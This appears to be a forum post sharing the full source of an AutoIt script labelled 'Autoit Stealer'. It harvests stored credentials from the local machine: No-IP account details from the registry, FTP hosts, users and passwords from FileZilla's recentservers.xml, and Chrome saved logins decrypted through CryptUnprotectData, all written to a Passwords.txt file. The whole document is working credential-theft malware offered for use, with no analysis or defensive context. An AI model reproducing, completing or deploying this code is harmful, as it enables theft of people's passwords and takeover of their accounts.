Código: Seleccionar todo

#comments-start
++++++++++++ Autoit Stealer
+++++++++ Write by; njq8
#comments-end
#include <SQLite.au3>
#include <SQLite.dll.au3>

$file=@ScriptDir &"\Passwords.txt"
if FileExists($file) then FileDelete($file)
$file_handle= fileopen($file ,1)
if $file_handle<>-1 Then
    FileWrite($file_handle,noip() & chrome() & FileZilla() )
    FileFlush($file_handle)
    FileClose($file_handle)
endif

Func NOIP()
$USR=RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC","Username")
if $USR="" then return ""
$PWD=RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC","Password")
Return "URL: http://no-ip.com/" & @crlf & "USR: " & $usr & @CRLF & "PWD (Base64): " & $pwd & @crlf & @CRLF
EndFunc

Func FileZilla()
Local $pwds,$h,$FN=EnvGet("appdata") &"\FileZilla\recentservers.xml"
if FileExists($fn)=false then return ""
$h= Fileopen($fn,0)
if $h=-1 then return ""
$host=""
$port=21
$usr=""
$pass=""
While True
    $line= FileReadLine($h)
     If @error = -1 Then ExitLoop
     if StringInStr($line,"<Host>") Then
         $usr=""
         $pass=""
         $port=21
         $host= StringMid($line,1,StringInStr($line,"</")-1)
         $host= StringMid($host,StringInStr($host,">")+1)
     EndIf
     if StringInStr($line,"<Port>") Then
         $port= StringMid($line,1,StringInStr($line,"</")-1)
         $port= StringMid($port,StringInStr($port,">")+1)
     EndIf
     if StringInStr($line,"<User>") Then
         $usr= StringMid($line,1,StringInStr($line,"</")-1)
         $usr= StringMid($usr,StringInStr($usr,">")+1)
     EndIf
     if StringInStr($line,"<Pass>") Then
         $pass= StringMid($line,1,StringInStr($line,"</")-1)
         $pass= StringMid($pass,StringInStr($pass,">")+1)
     EndIf
     if StringInStr($line,"</Server>") Then
    $pwds = $pwds & "URL: ftp://" & $host  &":" & $port & @CRLF & "USR: " & $usr & @CRLF & "PWD: " & $pass & @crlf & @CRLF
     EndIf
WEnd
Return $pwds
EndFunc
Func Chrome()
Local $Q, $R, $PWDS,$fn=EnvGet("localappdata") & "\Google\Chrome\User Data\Default\Login Data"
if FileExists($fn)=False then return ""
_SQLite_Startup()
_SQLite_Open($fn)
_SQLite_Query(-1, "SELECT * FROM logins;", $Q)
While _SQLite_FetchData($Q, $r) = 0
$pwds =   $pwds  & "URL: "& $r[0] & @CRLF &"USR: "& $r[3] & @crlf &"PWD: "& UncryptRDPPassword( $r[5]) & @CRLF & @CRLF
WEnd
_SQLite_Close()
_SQLite_Shutdown()
Return $pwds
EndFunc

Func UncryptRDPPassword($bin)
;This Func From >> http://www.autoitscript.com/forum/topic/96783-dllcall-for-cryptunprotectdata/#entry695769
    Local Const $CRYPTPROTECT_UI_FORBIDDEN = 0x1
    Local Const $DATA_BLOB = "int;ptr"

    Local $passStr = DllStructCreate("byte[1024]")
    Local $DataIn = DllStructCreate($DATA_BLOB)
    Local $DataOut = DllStructCreate($DATA_BLOB)
    $pwDescription = 'psw'
    $PwdHash = ""

    DllStructSetData($DataOut, 1, 0)
    DllStructSetData($DataOut, 2, 0)

    DllStructSetData($passStr, 1, $bin)
    DllStructSetData($DataIn, 2, DllStructGetPtr($passStr, 1))
    DllStructSetData($DataIn, 1, BinaryLen($bin))

    $return = DllCall("crypt32.dll","int", "CryptUnprotectData", _
                                    "ptr", DllStructGetPtr($DataIn), _
                                    "ptr", 0, _
                                    "ptr", 0, _
                                    "ptr", 0, _
                                    "ptr", 0, _
                                    "dword", $CRYPTPROTECT_UI_FORBIDDEN, _
                                    "ptr", DllStructGetPtr($DataOut))
    If @error Then Return ""

    $len = DllStructGetData($DataOut, 1)
    $PwdHash = Ptr(DllStructGetData($DataOut, 2))
    $PwdHash = DllStructCreate("byte[" & $len & "]", $PwdHash)
    Return BinaryToString(DllStructGetData($PwdHash, 1), 4)
EndFunc